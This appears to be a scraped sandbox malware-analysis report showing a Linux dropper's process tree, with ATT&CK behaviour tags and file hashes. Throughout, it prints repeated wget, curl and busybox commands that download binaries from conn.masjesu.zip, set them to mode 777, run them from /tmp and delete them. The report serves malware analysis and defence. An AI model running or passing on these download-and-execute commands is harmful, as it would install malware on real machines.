-
-
/bin/chmodchmod 777 3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu./3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm 3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- System Network Configuration Discovery
PID:960
-
-
/bin/chmodchmod 777 RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI./RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:962
-
-
/bin/rmrm RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵PID:967
-
-
/bin/chmodchmod 777 yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR./yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:969
-
-
/bin/rmrm yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵PID:974
-
-
/bin/chmodchmod 777 Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG./Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- System Network Configuration Discovery
PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- System Network Configuration Discovery
PID:981
-
-
/bin/chmodchmod 777 WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer./WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵PID:984
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵PID:985
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- System Network Configuration Discovery
PID:988
-
-
/bin/chmodchmod 777 ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA./ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA./PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW./4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm 4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s./MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- System Network Configuration Discovery
PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- System Network Configuration Discovery
PID:1017
-
-
/bin/chmodchmod 777 nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b./nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97